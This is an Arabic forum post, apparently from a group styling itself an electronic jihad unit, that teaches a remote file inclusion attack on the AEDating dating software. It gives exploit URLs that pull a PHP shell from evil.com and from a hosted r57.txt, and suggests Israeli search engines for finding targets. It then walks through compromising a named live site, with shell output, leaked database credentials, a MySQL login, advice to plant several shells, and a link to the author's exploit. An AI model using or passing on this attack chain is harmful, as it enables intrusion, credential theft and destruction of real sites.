Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: AEDating (all versions) Remote File inclusion. ـ [ شرح ]


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
AEDating (all versions) Remote File inclusion. ـ [ شرح ]
Permalink   
 




سلام عليكم

##


كود:
c99shell v. 1.0 pre-release build #16


معلومات الثغرهـ
##

النوع : AEDating Remote File inclusion.

الاهتمام : خطيــر

نوع الاصدرات المصابه : (all versions) << جميع الاصدرات


توضيح الخطاء فى الملف المصااب :


كود:
Vulnerable code:
/inc/design.inc.php
/inc/admin_design.inc.php
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );




الاستثمار : Exploit:



كود PHP:


http://site.com/[******_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[******_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ? 


طريقه البحث

البحث فى جميع الاصدارات

محركات البحث :

فيه عندكم كم محرك اسرائيلي جيد


كود PHP:


http://www.achla.co.il/ 
http://www.reshet.co.il/data/index.vs?dw=1 
http://www.maven.co.il/ 
http://www.tapuz.co.il/ 
http://www.walla.co.il/ 
http://www.info.gov.il/find.pl 


أما البحث بالغه العبريه فستخدم :


كود:
הגישה אסורה


كيفيه التطبيق بعد البحث فى المحركات :


الموقع المستهدف : http://www.ujambo.com

الان كيف نعرف الموقع مصاب أم لأ ..

نضع خلف الموقع مباشرهـ



كود:
/inc


فيصبح رابط الموقع هيك << ايش عنده السوري


كود:
http://www.ujambo.com/inc/



الان بعد ماوجدنا ملفااات الموقع التي تظهر لناا هكذاا


كود PHP:


RadiusAssistant.inc     17-Jun-2005 01:58     1k  
 admin
.inc.php           17-Jun-2005 01:57    63k  
 admin_design
.inc.php    17-Jun-2005 01:57    31k  
 aemedia
.nsi             17-Jun-2005 00:39     2k  
 banners
.inc.php         17-Jun-2005 01:57     1k  
 config_design_act
.in..> 17-Jun-2005 01:57     5k  
 config_design_adl
.in..> 17-Jun-2005 01:57     5k  
 config_design_ae3
.in..> 17-Jun-2005 01:57     4k  
 config_design_ae4
.in..> 17-Jun-2005 01:57     4k  
 config_design_def
.in..> 17-Jun-2005 01:57     4k  
 config_design_dlt
.in..> 17-Jun-2005 01:57     4k  
 config_design_frt
.in..> 17-Jun-2005 01:57     5k  
 config_design_hip
.in..> 17-Jun-2005 01:57     5k  
 config_design_mcl
.in..> 17-Jun-2005 01:57     3k  
 db
.inc.php              05-Jun-2006 01:19     4k  
 design
.inc.php          26-Sep-2005 01:29    52k  
 header
.inc.php          23-Nov-2005 05:54     2k  
 header
.inc.php-old      15-Jun-2005 16:40     2k 



##

نلاحظ فى الملفات ملف admin.inc.php
ماليزمنا يعني لا يجي واحد مطفي النور يقول يلعن أم الفله ياحساام وفنكش الشغل

نجي للمهم
نبحث الان عن ملف أسمهـ design.inc.php عندما نجد الملجد نضغط عليه علشان نشوف هل فيه اخطاء برمجيه .. أو لا

فقط !! لتجريبه ورايح تظهر فى الصفحه الاخطاء التاليه اذا كان فيه اخطاء



كود PHP:


Warningmysql_pconnect() [function.mysql-pconnect]: Access denied for user 'nobody'@'localhost' (using ********: NOin /home/ujambo/public_html/inc/db.inc.php on line 20

Warning
mysql_select_db() [function.mysql-select-db]: Access denied for user 'nobody'@'localhost' (using ********: NOin /home/ujambo/public_html/inc/db.inc.php on line 29

Warning
mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /home/ujambo/public_html/inc/db.inc.php on line 29

Warning
mysql_select_db() [function.mysql-select-db]: Access denied for user 'nobody'@'localhost' (using ********: NOin /home/ujambo/public_html/inc/db.inc.php on line 29

Warning
mysql_select_db() [function.mysql-select-db]: A link to the server could not be established in /home/ujambo/public_html/inc/db.inc.php on line 29 


^
^
^
ياسلام هذا المطلوب الان نعود سريعاً علشان نطبق قبل يسكرون الباب

الان نجي كيف نركب الكوود تبع الاستثمار : ورايح يجيبنا كذا


نلاحظ انا فعلنا اضافتين فقط وهيه مستنبطه من نفس الكوود الي مكتشفه صاحب الثغره


كود:
http://www.ujambo.com/inc/design.inc.php?dir[inc]=



انا ضفنا بعد اسم الموقع الملف المصااب مع تغير المتغيرات الي هيه


كود:
inc/design.inc.php?dir[inc]=


والان اصبح shell تبعك فى هذا المسار


كود:
http://www.ujambo.com/inc/design.inc.php?dir[inc]=http://caring-today.org/r57.txt?


والان دخلنا shell


كود:
Software: Apache/1.3.37 (Unix) mod_deflate/1.0.21 PHP/5.1.4 PHP/4.4.3 mod_auth_****through/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_jk/1.2.8 FrontPage/5.0.2.2634a mod_ssl/2.8.28 OpenSSL/0.9.7a
uname -a: Linux ariqua.hostforweb.net 2.4.32-ow1-acl #7 SMP Mon Jul 17 23:19:36 CDT 2006 i686
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Safe-mode: OFF (not secure)
/home/ujambo/public_html/inc/ drwxr-xr-x
Free 1.66 GB of 68.6 GB (2.41%)



ايش نسوي الان بعد دخول الشل !! نزرع بطيخ .. لا طبعاً

نروح نتصل فى قواعد البياانات

نبحث الان فى الملفات الي على الشل عن ملف أسمهـ header.inc.php

ونروح على التحرير لهذا الملف

يجي واحد ينشبلي الان فين التحرير الي تقول عليه يابدر انت اذا شفت الملف رووح على طوول اول لفه ثاني لفه اكبس عليهاا الي فيهاا قلم رصاص على ورقه << صح التوصيف ههههههههه

اذا دخلت على التحرير وقتها بتحصل حجات كذا اتررك منهاا


كود:
PRE_CHECKOUT_LINK = "$site[url]checkout/pre_checkout.php";
$ID_PIC_DIR = "$dir[root]id_img/";
$ID_PIC_URL = "$site[url]id_img/";
$ID_SOUND_DIR = "$dir[root]id_wav/";
$TMP_SOUND_DIR = "$dir[root]tmp/";
$TMP_SOUND_URL = "$site[url]tmp/";
$ID_VIDEO_DIR = "$dir[root]id_avi/";
$TMP_VIDEO_DIR = "$dir[root]tmp/";
$TMP_VIDEO_URL = "$site[url]tmp/";
$video_ext = "avi";
$MOGRIFY = "/usr/bin/mogrify";
$CONVERT = "/usr/bin/convert";
$SOX = "/usr/bin/sox";



أبحث عن اسم الادمن واسم القاعده والباسورد

وهذي الي رايح نتصل فيها

بعد ماجبنا الملعومات من السيرفر


كود:
BUG_REPORT_EMAIL = 'errors@ujambo.com';
$db['host'] = 'localhost';
$db['sock'] = '';
$db['port'] = '';
$db['user'] = 'ujambo_admin';
$db['****wd'] = 'ujambo2005';
$db['db'] = 'ujambo_main';


الان يجي واحد وينشب من فين اتصل

نروح على SQL

بيجينا : ثلاث خيارااات


كود:
Username Pa s s w o r d Database


نشيل اسم الرووت ونضع اسم الادمن والبيانات الي اخذنها

بعد النجاح بالدخوول !!


بيعرضلنا


كود:
SQL Manager:
MySQL 4.1.21-standard (proto v.10) running in localhost:3306 as ujambo_admin@localhost (******** - "ujambo2005")
[ Index ] [ Query ] [ Server-status ] [ Server variables ] [ Processes ] [ Logout ]


لتطبيق :

[ 1 ]

[ 2 ]


ووقتهاا العب وحذف وعدل فى كل فى الموقع الي انت عليه من تطيره او العب فى ملفاااته ..

واحب اركز على شغله معينه ذاا دخلت SHELL حاول ترفعلك اكثر من شل فى كم ملف علشان تضمن الدخول فى كل مررره


وهنا رفعت لااستثمار مع التطبيق لعدم الشفير



كود PHP:


http://www.boob11.com/BADER/KSA.X.txt 


####

تم الشرح والحمد لله بالتفصيل وعاد الله بالمواقع
وأيت خطاء فى الشرح ارجوو العذر على سرعتي فى الشرح وعدم وجود الصور

- - - - - - -


يلا الان نووم اشوفكم بااكر

#####

التوفيق للجميع


milw0rm

#####



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard